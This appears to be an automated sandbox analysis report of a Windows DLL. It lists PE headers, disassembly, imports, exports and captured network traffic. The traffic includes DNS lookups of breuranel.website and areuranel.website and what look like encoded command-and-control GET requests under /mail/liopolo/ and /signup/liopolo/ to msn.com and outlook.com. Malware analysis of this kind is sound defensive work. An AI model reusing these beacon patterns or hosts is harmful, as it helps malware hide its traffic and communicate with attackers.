                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                          Time Stamp:0x5F6FEFFF [Sun Sep 27 01:50:55 2020 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:6
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:6
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:6
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:8acc1c3be9064cb55c8e3d7147f3d7c3

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          cmp dword ptr [ebp+0Ch], 01h
                                                                                                          jne 00007F07BCC462C7h
                                                                                                          call 00007F07BCC46DB2h
                                                                                                          push dword ptr [ebp+10h]
                                                                                                          push dword ptr [ebp+0Ch]
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          call 00007F07BCC4616Ah
                                                                                                          add esp, 0Ch
                                                                                                          pop ebp
                                                                                                          retn 000Ch
                                                                                                          mov ecx, dword ptr [ebp-0Ch]
                                                                                                          mov dword ptr fs:[00000000h], ecx
                                                                                                          pop ecx
                                                                                                          pop edi
                                                                                                          pop edi
                                                                                                          pop esi
                                                                                                          pop ebx
                                                                                                          mov esp, ebp
                                                                                                          pop ebp
                                                                                                          push ecx
                                                                                                          ret
                                                                                                          mov ecx, dword ptr [ebp-10h]
                                                                                                          xor ecx, ebp
                                                                                                          call 00007F07BCC45EC3h
                                                                                                          jmp 00007F07BCC462A0h
                                                                                                          mov ecx, dword ptr [ebp-14h]
                                                                                                          xor ecx, ebp
                                                                                                          call 00007F07BCC45EB2h
                                                                                                          jmp 00007F07BCC4628Fh
                                                                                                          push eax
                                                                                                          push dword ptr fs:[00000000h]
                                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          mov dword ptr [eax], ebp
                                                                                                          mov ebp, eax
                                                                                                          mov eax, dword ptr [100AA0D4h]
                                                                                                          xor eax, ebp
                                                                                                          push eax
                                                                                                          push dword ptr [ebp-04h]
                                                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                          ret
                                                                                                          push eax
                                                                                                          push dword ptr fs:[00000000h]
                                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          mov dword ptr [eax], ebp
                                                                                                          mov ebp, eax
                                                                                                          mov eax, dword ptr [100AA0D4h]
                                                                                                          xor eax, ebp
                                                                                                          push eax
                                                                                                          mov dword ptr [ebp-10h], eax
                                                                                                          push dword ptr [ebp-04h]
                                                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                          ret
                                                                                                          push eax
                                                                                                          inc dword ptr fs:[eax]

                                                                                                          Data Directories

                                                                                                          Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT          0xa8990          0x80          .rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT          0xa8a10          0x50          .rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC       0x146000         0x53d0        .reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG           0xa474c          0x54          .rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa47a0          0x40          .rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT             0x7b000          0x1fc         .rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                          Sections

                                                                                                          Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                                                                                          .text   0x1000           0x79f71       0x7a000   False     0.510071801358   data       6.75461975802  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata  0x7b000          0x2e586       0x2e600   False     0.556377400606   data       5.60164615331  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data   0xaa000          0x9b19c       0x1800    False     0.190266927083   data       4.15778005426  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .reloc  0x146000         0x53d0        0x5400    False     0.752650669643   data       6.72453697464  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Imports

                                                                                                          DLL           Import
                                                                                                          KERNEL32.dll  LockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
                                                                                                          USER32.dll    TranslateMessage, CreateMenu, UnregisterHotKey, DeferWindowPos, RegisterWindowMessageW, BeginDeferWindowPos, GetPropW
                                                                                                          MSACM32.dll   acmFormatChooseW, acmFilterEnumW, acmFilterTagDetailsW, acmFilterDetailsW, acmDriverClose, acmFormatDetailsW, acmDriverOpen, acmDriverPriority, acmDriverMessage, acmFormatTagEnumW, acmDriverAddW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverEnum, acmFormatEnumW, acmDriverID, acmFormatSuggest, acmDriverDetailsW, acmFilterChooseW, acmGetVersion, acmDriverRemove, acmMetrics

                                                                                                          Exports

                                                                                                          Name        Ordinal  Address
                                                                                                          BeGrass     1        0x10016020
                                                                                                          Fieldeight  2        0x100162f0
                                                                                                          Often       3        0x10016510
                                                                                                          Townenter   4        0x100167a0

                                                                                                          Network Behavior

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                          Oct 11, 2021 22:35:36.104392052 CEST4434976113.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:36.720808029 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:36.720849037 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:36.720937967 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:36.728974104 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:36.729003906 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.044668913 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.044819117 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.047748089 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.047772884 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.048060894 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.101821899 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.458256960 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.503140926 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.574573994 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.574657917 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.575021982 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.575855970 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.575877905 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:35:37.575956106 CEST49763443192.168.2.613.82.28.61
                                                                                                          Oct 11, 2021 22:35:37.575964928 CEST4434976313.82.28.61192.168.2.6
                                                                                                          Oct 11, 2021 22:36:17.610728979 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:17.610759974 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:17.610867977 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:17.611726999 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:17.611743927 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.128029108 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.128792048 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.132210016 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.132224083 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.132575989 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.138678074 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.179141998 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.307991028 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.308073044 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.308492899 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.308541059 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.308572054 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.308588028 CEST49777443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.308599949 CEST4434977740.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.383008957 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.383053064 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.386106014 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.386921883 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.386948109 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.481684923 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.481864929 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.488152981 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.488179922 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.488593102 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.491640091 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.521219969 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.521337032 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.521491051 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.521552086 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.521565914 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.521938086 CEST49778443192.168.2.652.98.199.194
                                                                                                          Oct 11, 2021 22:36:18.521955013 CEST4434977852.98.199.194192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.550992966 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.551038980 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.551259995 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.552093983 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.552125931 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.647032022 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.647165060 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.651844978 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.651861906 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.652160883 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.654882908 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.695138931 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.718173981 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.718261957 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.718323946 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.726743937 CEST49779443192.168.2.652.98.208.66
                                                                                                          Oct 11, 2021 22:36:18.726766109 CEST4434977952.98.208.66192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.785830975 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.785887957 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:18.786026955 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.786667109 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:18.786684990 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.294521093 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.294776917 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:19.297009945 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:19.297032118 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.297462940 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.299602985 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:19.343142033 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.468770981 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.468847036 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.468961954 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:19.470700026 CEST49780443192.168.2.640.97.161.50
                                                                                                          Oct 11, 2021 22:36:19.470731020 CEST4434978040.97.161.50192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.498827934 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.498862028 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.498971939 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.499624014 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.499645948 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.594341040 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.594475031 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.606277943 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.606297016 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.606688023 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.614052057 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.649470091 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.649558067 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.649651051 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.651978970 CEST49781443192.168.2.652.97.178.34
                                                                                                          Oct 11, 2021 22:36:19.652009964 CEST4434978152.97.178.34192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.697753906 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.697793961 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.697892904 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.703511953 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.703547001 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.796855927 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.796951056 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.800255060 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.800277948 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.800935984 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.803472996 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.847250938 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.874670029 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.875168085 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.875250101 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.876300097 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.876322031 CEST4434978252.97.178.98192.168.2.6
                                                                                                          Oct 11, 2021 22:36:19.876384020 CEST49782443192.168.2.652.97.178.98
                                                                                                          Oct 11, 2021 22:36:19.876405954 CEST4434978252.97.178.98192.168.2.6

                                                                                                          UDP Packets

                                                                                                          DNS Queries

                                                                                                          Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                   Type            Class
                                                                                                          Oct 11, 2021 22:35:35.229856014 CEST  192.168.2.6  8.8.8.8  0x6aae    Standard query (0)  msn.com                A (IP address)  IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:36.111063957 CEST  192.168.2.6  8.8.8.8  0x3e28    Standard query (0)  www.msn.com            A (IP address)  IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:36.687268019 CEST  192.168.2.6  8.8.8.8  0x7b05    Standard query (0)  msn.com                A (IP address)  IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:37.600009918 CEST  192.168.2.6  8.8.8.8  0x28e1    Standard query (0)  www.msn.com            A (IP address)  IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:57.504539967 CEST  192.168.2.6  8.8.8.8  0x9ef7    Standard query (0)  breuranel.website      A (IP address)  IN (0x0001)
                                                                                                          Oct 11, 2021 22:35:58.419724941 CEST  192.168.2.6  8.8.8.8  0x42f7    Standard query (0)  breuranel.website      A (IP address)  IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:17.590590954 CEST  192.168.2.6  8.8.8.8  0x4c3e    Standard query (0)  outlook.com            A (IP address)  IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.361334085 CEST  192.168.2.6  8.8.8.8  0xd19a    Standard query (0)  www.outlook.com        A (IP address)  IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.529942036 CEST  192.168.2.6  8.8.8.8  0x1f03    Standard query (0)  outlook.office365.com  A (IP address)  IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:18.767518044 CEST  192.168.2.6  8.8.8.8  0x7ff6    Standard query (0)  outlook.com            A (IP address)  IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.477575064 CEST  192.168.2.6  8.8.8.8  0x382d    Standard query (0)  www.outlook.com        A (IP address)  IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:19.675849915 CEST  192.168.2.6  8.8.8.8  0xa1eb    Standard query (0)  outlook.office365.com  A (IP address)  IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:38.823678970 CEST  192.168.2.6  8.8.8.8  0xa792    Standard query (0)  areuranel.website      A (IP address)  IN (0x0001)
                                                                                                          Oct 11, 2021 22:36:40.759514093 CEST  192.168.2.6  8.8.8.8  0x5f89    Standard query (0)  areuranel.website      A (IP address)  IN (0x0001)

                                                                                                          DNS Answers


                                                                                                          HTTP Request Dependency Graph

                                                                                                          • msn.com
                                                                                                          • outlook.com
                                                                                                          • www.outlook.com
                                                                                                          • outlook.office365.com

                                                                                                          HTTPS Proxied Packets

                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                          0 | 192.168.2.6 | 49761 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                          2021-10-11 20:35:35 UTC | 0 | OUT | GET /mail/liopolo/g1XXBsAxpar6N9kYzRnrf3/OQX2uNrM13y9W/Ob_2BksA/x8bQpkLjYsruIhPFJi3ZErA/tgPZIh6fnf/T9Sy6miArqkO107Ts/8FGy1p_2BKcs/IbQATX6Vpot/p9H1S_2FBpU5gj/XH9RZi7pSy90EfKCN0xoX/QAyaPWXD19YFLug2/I6ErSp8Uq8hZ5g3/WwbSra7jr8/n3VI4u.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: msn.com
                                                                                                          2021-10-11 20:35:36 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Location: https://www.msn.com/mail/liopolo/g1XXBsAxpar6N9kYzRnrf3/OQX2uNrM13y9W/Ob_2BksA/x8bQpkLjYsruIhPFJi3ZErA/tgPZIh6fnf/T9Sy6miArqkO107Ts/8FGy1p_2BKcs/IbQATX6Vpot/p9H1S_2FBpU5gj/XH9RZi7pSy90EfKCN0xoX/QAyaPWXD19YFLug2/I6ErSp8Uq8hZ5g3/WwbSra7jr8/n3VI4u.jre
                                                                                                          Server: Microsoft-IIS/8.5
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Date: Mon, 11 Oct 2021 20:35:35 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 371
                                                                                                          Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/g1XXBsAxpar6N9kYzRnrf3/OQX2uNrM13y9W/Ob_2BksA/x8bQpkLjYsruIhPFJi3ZErA/tgPZIh6fnf/T9Sy6miArqkO107Ts/8FGy1p_2BKcs/IbQA


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                          1 | 192.168.2.6 | 49763 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                          2021-10-11 20:35:37 UTC | 1 | OUT | GET /mail/liopolo/Y72qNipk37Ef6u/yMdIBjS0TF0zySEk6QqaV/RM1KEI93T2ySqpPS/3a9271HiYU26bKL/CuRYvP0IHiJcR1Om5j/v_2BngoS3/PTV0r6xFeitoJIhrqq8c/AEX9VsNnHNbr2POb3_2/FNC3movbIQSikKNXB2GV0p/4fgFX9c16BwP9/WREoUF91/5ZKv3_2F1kKAcsEj_2FjVau/em3Y7wQlz5/TIVYBPW_2/FO9688N.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: msn.com
                                                                                                          2021-10-11 20:35:37 UTC | 1 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Location: https://www.msn.com/mail/liopolo/Y72qNipk37Ef6u/yMdIBjS0TF0zySEk6QqaV/RM1KEI93T2ySqpPS/3a9271HiYU26bKL/CuRYvP0IHiJcR1Om5j/v_2BngoS3/PTV0r6xFeitoJIhrqq8c/AEX9VsNnHNbr2POb3_2/FNC3movbIQSikKNXB2GV0p/4fgFX9c16BwP9/WREoUF91/5ZKv3_2F1kKAcsEj_2FjVau/em3Y7wQlz5/TIVYBPW_2/FO9688N.jre
                                                                                                          Server: Microsoft-IIS/8.5
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Date: Mon, 11 Oct 2021 20:35:37 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 398
                                                                                                          Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/Y72qNipk37Ef6u/yMdIBjS0TF0zySEk6QqaV/RM1KEI93T2ySqpPS/3a9271HiYU26bKL/CuRYvP0IHiJcR1Om5j/v_2BngoS3/PTV0r6xFeitoJIhrq


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                          2 | 192.168.2.6 | 49777 | 40.97.161.50 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                          2021-10-11 20:36:18 UTC | 2 | OUT | GET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: outlook.com
                                                                                                          2021-10-11 20:36:18 UTC | 3 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Location: https://www.outlook.com/signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          request-id: 6e1f0e87-1066-4faf-c046-ce5e26254186
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          X-FEServer: MWHPR11CA0029
